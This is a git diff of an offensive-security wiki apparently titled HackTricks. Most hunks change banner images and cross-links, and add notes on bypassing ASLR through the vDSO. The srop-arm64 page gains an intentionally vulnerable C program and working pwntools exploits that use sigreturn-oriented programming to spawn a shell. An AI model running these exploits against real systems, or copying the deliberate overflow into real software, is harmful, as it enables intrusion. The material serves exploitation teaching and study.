diff --git a/.gitbook/assets/image (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1).png index cee86ab50..e70bceed6 100644 Binary files a/.gitbook/assets/image (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1).png index e70bceed6..ee3722524 100644 Binary files a/.gitbook/assets/image (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (1).png b/.gitbook/assets/image (1) (1).png index ee3722524..82f1650c7 100644 Binary files a/.gitbook/assets/image (1) (1).png and b/.gitbook/assets/image (1) (1).png differ diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png index 82f1650c7..d798d9edc 100644 Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png index d798d9edc..3b1e0666a 100644 Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ diff --git a/binary-exploitation/basic-binary-exploitation-methodology/tools/README.md b/binary-exploitation/basic-binary-exploitation-methodology/tools/README.md index 05bb7673e..94f370296 100644 --- a/binary-exploitation/basic-binary-exploitation-methodology/tools/README.md +++ b/binary-exploitation/basic-binary-exploitation-methodology/tools/README.md @@ -125,6 +125,9 @@ pattern search $rsp #Search the offset given the content of $rsp shellcode search x86 #Search shellcodes shellcode get 61 #Download shellcode number 61 +#Dump memory to file +dump binary memory /tmp/dump.bin 0x200000000 0x20000c350 + #Another way to get the offset of to the RIP 1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it 2- ef➤ i f diff --git a/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md b/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md index 132577861..9a8995c78 100644 --- a/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md +++ b/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md @@ -307,6 +307,14 @@ gef➤ x/4i 0xffffffffff600800 0xffffffffff60080a: int3 ``` +### vDSO + +Note therefore how it might be possible to **bypass ASLR abusing the vdso** if the kernel is compiled with CONFIG\_COMPAT\_VDSO as the vdso address won't be randomized. For more info check: + +{% content-ref url="../../rop-return-oriented-programing/ret2vdso.md" %} +[ret2vdso.md](../../rop-return-oriented-programing/ret2vdso.md) +{% endcontent-ref %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md b/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md index 37d9d0409..68cce870b 100644 --- a/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md +++ b/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md @@ -40,7 +40,7 @@ This gadget basically allows to confirm that something interesting was executed This technique uses the [**ret2csu**](ret2csu.md) gadget. And this is because if you access this gadget in the middle of some instructions you get gadgets to control **`rsi`** and **`rdi`**: -

https://www.scs.stanford.edu/brop/bittau-brop.pdf

+

https://www.scs.stanford.edu/brop/bittau-brop.pdf

These would be the gadgets: diff --git a/binary-exploitation/rop-return-oriented-programing/ret2csu.md b/binary-exploitation/rop-return-oriented-programing/ret2csu.md index 8204f3aed..77f46535a 100644 --- a/binary-exploitation/rop-return-oriented-programing/ret2csu.md +++ b/binary-exploitation/rop-return-oriented-programing/ret2csu.md @@ -87,7 +87,7 @@ gef➤ search-pattern 0x400560 Another way to control **`rdi`** and **`rsi`** from the ret2csu gadget is by accessing it specific offsets: -

https://www.scs.stanford.edu/brop/bittau-brop.pdf

+

https://www.scs.stanford.edu/brop/bittau-brop.pdf

Check this page for more info: diff --git a/binary-exploitation/rop-return-oriented-programing/ret2vdso.md b/binary-exploitation/rop-return-oriented-programing/ret2vdso.md index 56d4ce767..506a8cb15 100644 --- a/binary-exploitation/rop-return-oriented-programing/ret2vdso.md +++ b/binary-exploitation/rop-return-oriented-programing/ret2vdso.md @@ -67,6 +67,18 @@ or_al_byte_ptr_ebx_pop_edi_pop_ebp_ret_addr = vdso_addr + 0xccb pop_ebx_pop_esi_pop_ebp_ret = vdso_addr + 0x15cd ``` +{% hint style="danger" %} +Note therefore how it might be possible to **bypass ASLR abusing the vdso** if the kernel is compiled with CONFIG\_COMPAT\_VDSO as the vdso address won't be randomized: [https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639](https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639) +{% endhint %} + +### ARM64 + +After dumping and checking the vdso section of a binary in kali 2023.2 arm64, I couldn't find in there any interesting gadget (no way to control registers from values in the stack or to control x30 for a ret) **except a way to call a SROP**. Check more info int eh example from the page: + +{% content-ref url="srop-sigreturn-oriented-programming/srop-arm64.md" %} +[srop-arm64.md](srop-sigreturn-oriented-programming/srop-arm64.md) +{% endcontent-ref %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md b/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md index b7494b0b8..125322a17 100644 --- a/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md +++ b/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md @@ -14,26 +14,70 @@ Other ways to support HackTricks:
-## Code +## Pwntools example + +This example is creating the vulnerable binary and exploiting it. The binary **reads into the stack** and then calls **`sigreturn`**: + +```python +from pwn import * + +binsh = "/bin/sh" +context.clear() +context.arch = "arm64" + +asm = '' +asm += 'sub sp, sp, 0x1000\n' +asm += shellcraft.read(constants.STDIN_FILENO, 'sp', 1024) #Read into the stack +asm += shellcraft.sigreturn() # Call sigreturn +asm += 'syscall: \n' #Easy symbol to use in the exploit +asm += shellcraft.syscall() +asm += 'binsh: .asciz "%s"' % binsh #To have the "/bin/sh" string in memory +binary = ELF.from_assembly(asm) + +frame = SigreturnFrame() +frame.x8 = constants.SYS_execve +frame.x0 = binary.symbols['binsh'] +frame.x1 = 0x00 +frame.x2 = 0x00 +frame.pc = binary.symbols['syscall'] + +p = process(binary.path) +p.send(bytes(frame)) +p.interactive() +``` + +## bof example + +### Code ```c #include #include +#include void do_stuff(int do_arg){ if (do_arg == 1) - __asm__("mov x0, #139; svc #0;"); + __asm__("mov x8, 0x8b; svc 0;"); return; } + char* vulnerable_function() { char buffer[64]; - fgets(buffer, sizeof(buffer)*3, stdin); + read(STDIN_FILENO, buffer, 0x1000); // <-- bof vulnerability + return buffer; } -int main(int argc, char **argv) { +char* gen_stack() { + char use_stack[0x2000]; + strcpy(use_stack, "Hello, world!"); char* b = vulnerable_function(); + return use_stack; +} + +int main(int argc, char **argv) { + char* b = gen_stack(); do_stuff(2); return 0; } @@ -50,9 +94,71 @@ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # Disable ASLR The exploit abuses the bof to return to the call to **`sigreturn`** and prepare the stack to call **`execve`** with a pointer to `/bin/sh`. -{% hint style="danger" %} -For some reason I don't know the call to **`sigreturn`** is not doing anything so it doesn't work. -{% endhint %} +```python +from pwn import * + +p = process('./srop') +elf = context.binary = ELF('./srop') +libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6") +libc.address = 0x0000fffff7df0000 # ASLR disabled +binsh = next(libc.search(b"/bin/sh")) + +stack_offset = 72 + +sigreturn = 0x00000000004006e0 # Call to sig +svc_call = 0x00000000004006e4 # svc #0x0 + +frame = SigreturnFrame() +frame.x8 = 0xdd # syscall number for execve +frame.x0 = binsh +frame.x1 = 0x00 # NULL +frame.x2 = 0x00 # NULL +frame.pc = svc_call + +payload = b'A' * stack_offset +payload += p64(sigreturn) +payload += bytes(frame) + +p.sendline(payload) +p.interactive() +``` + +## bof example without sigreturn + +### Code + +```c +#include +#include +#include + +char* vulnerable_function() { + char buffer[64]; + read(STDIN_FILENO, buffer, 0x1000); // <-- bof vulnerability + + return buffer; +} + +char* gen_stack() { + char use_stack[0x2000]; + strcpy(use_stack, "Hello, world!"); + char* b = vulnerable_function(); + return use_stack; +} + +int main(int argc, char **argv) { + char* b = gen_stack(); + return 0; +} +``` + +## Exploit + +In the section **`vdso`** it's possible to find a call to **`sigreturn`** in the offset **`0x7b0`**: + +
+ +Therefore, if leaked, it's possible to **use this address to access a `sigreturn`** if the binary isn't loading it: ```python from pwn import * @@ -63,32 +169,38 @@ libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6") libc.address = 0x0000fffff7df0000 # ASLR disabled binsh = next(libc.search(b"/bin/sh")) -print("/bin/sh in: " + hex(binsh)) - stack_offset = 72 -sigreturn = 0x00000000004006a0 # mov x0, #0x8b ; svc #0x0 -svc_call = 0x00000000004006a4 # svc #0x0 - +sigreturn = 0x00000000004006e0 # Call to sig +svc_call = 0x00000000004006e4 # svc #0x0 frame = SigreturnFrame() frame.x8 = 0xdd # syscall number for execve -frame.x0 = binsh # pointer to /bin/sh -frame.x1 = 0x4343434343434343 # NULL -frame.x2 = 0x0 # NULL +frame.x0 = binsh +frame.x1 = 0x00 # NULL +frame.x2 = 0x00 # NULL frame.pc = svc_call payload = b'A' * stack_offset payload += p64(sigreturn) -payload += b"B" * len(bytes(frame)) - -with open("/tmp/i", "wb") as f: - f.write(payload) +payload += bytes(frame) p.sendline(payload) p.interactive() ``` +For more info about vdso check: + +{% content-ref url="../ret2vdso.md" %} +[ret2vdso.md](../ret2vdso.md) +{% endcontent-ref %} + +And to bypass the address of `/bin/sh` you could create several env variables pointing to it, for more info: + +{% content-ref url="../../common-binary-protections-and-bypasses/aslr/" %} +[aslr](../../common-binary-protections-and-bypasses/aslr/) +{% endcontent-ref %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/generic-methodologies-and-resources/external-recon-methodology/README.md b/generic-methodologies-and-resources/external-recon-methodology/README.md index 22b551ebf..e746f9802 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/README.md +++ b/generic-methodologies-and-resources/external-recon-methodology/README.md @@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -730,7 +730,7 @@ There are several tools out there that will perform part of the proposed actions * All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI) -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md index 937e09f0d..5b75710c6 100644 --- a/generic-methodologies-and-resources/pentesting-methodology.md +++ b/generic-methodologies-and-resources/pentesting-methodology.md @@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -150,7 +150,7 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve * [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md) * [**Padding Oracle**](../crypto-and-stego/padding-oracle-priv.md) -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md b/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md index 3718738d4..e45cb8c1c 100644 --- a/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md +++ b/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -133,7 +133,7 @@ However, in this kind of containers these protections will usually exist, but yo You can find **examples** on how to **exploit some RCE vulnerabilities** to get scripting languages **reverse shells** and execute binaries from memory in [**https://github.com/carlospolop/DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE). -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/network-services-pentesting/pentesting-snmp/README.md b/network-services-pentesting/pentesting-snmp/README.md index 7e2d77e7e..39f244a47 100644 --- a/network-services-pentesting/pentesting-snmp/README.md +++ b/network-services-pentesting/pentesting-snmp/README.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -260,7 +260,7 @@ If there is an ACL that only allows some IPs to query the SMNP service, you can * snmpd.conf * snmp-config.xml -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/network-services-pentesting/pentesting-snmp/cisco-snmp.md b/network-services-pentesting/pentesting-snmp/cisco-snmp.md index 9bb61797b..9b4ed62cc 100644 --- a/network-services-pentesting/pentesting-snmp/cisco-snmp.md +++ b/network-services-pentesting/pentesting-snmp/cisco-snmp.md @@ -12,7 +12,7 @@ -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -53,7 +53,7 @@ msf6 auxiliary(scanner/snmp/snmp_enum) > exploit * [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/network-services-pentesting/pentesting-web/README.md b/network-services-pentesting/pentesting-web/README.md index 895cb29d5..b468644bd 100644 --- a/network-services-pentesting/pentesting-web/README.md +++ b/network-services-pentesting/pentesting-web/README.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -365,7 +365,7 @@ Find more info about web vulns in: You can use tools such as [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) to monitor pages for modifications that might insert vulnerabilities. -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/network-services-pentesting/pentesting-web/jira.md b/network-services-pentesting/pentesting-web/jira.md index 87e1de4ca..b402d101d 100644 --- a/network-services-pentesting/pentesting-web/jira.md +++ b/network-services-pentesting/pentesting-web/jira.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -80,7 +80,7 @@ curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"h * [https://github.com/0x48piraj/Jiraffe](https://github.com/0x48piraj/Jiraffe) * [https://github.com/bcoles/jira\_scan](https://github.com/bcoles/jira\_scan) -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/pentesting-web/file-upload/README.md b/pentesting-web/file-upload/README.md index 0107816ab..071a58d29 100644 --- a/pentesting-web/file-upload/README.md +++ b/pentesting-web/file-upload/README.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -340,7 +340,7 @@ More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-frie * [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) * [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a) -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/pentesting-web/hacking-jwt-json-web-tokens.md b/pentesting-web/hacking-jwt-json-web-tokens.md index b84d318d4..891259401 100644 --- a/pentesting-web/hacking-jwt-json-web-tokens.md +++ b/pentesting-web/hacking-jwt-json-web-tokens.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -279,7 +279,7 @@ The token's expiry is checked using the "exp" Payload claim. Given that JWTs are {% embed url="https://github.com/ticarpi/jwt_tool" %} -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/pentesting-web/ldap-injection.md b/pentesting-web/ldap-injection.md index 1a7d443ec..b264c0e94 100644 --- a/pentesting-web/ldap-injection.md +++ b/pentesting-web/ldap-injection.md @@ -16,7 +16,7 @@ Other ways to support HackTricks: -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -235,7 +235,7 @@ intitle:"phpLDAPadmin" inurl:cmd.php {% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %} -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/pentesting-web/sql-injection/postgresql-injection/README.md b/pentesting-web/sql-injection/postgresql-injection/README.md index e6270f448..3380927a8 100644 --- a/pentesting-web/sql-injection/postgresql-injection/README.md +++ b/pentesting-web/sql-injection/postgresql-injection/README.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -106,7 +106,7 @@ SELECT $$hacktricks$$; SELECT $TAG$hacktricks$TAG$; ``` -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md index 01f3e1c10..b8f49b4a4 100644 --- a/pentesting-web/xss-cross-site-scripting/README.md +++ b/pentesting-web/xss-cross-site-scripting/README.md @@ -1,6 +1,6 @@ # XSS (Cross Site Scripting) -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -1544,7 +1544,7 @@ Find **more SVG payloads in** [**https://github.com/allanlw/svg-cheatsheet**](ht * [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec) * [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html) -
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).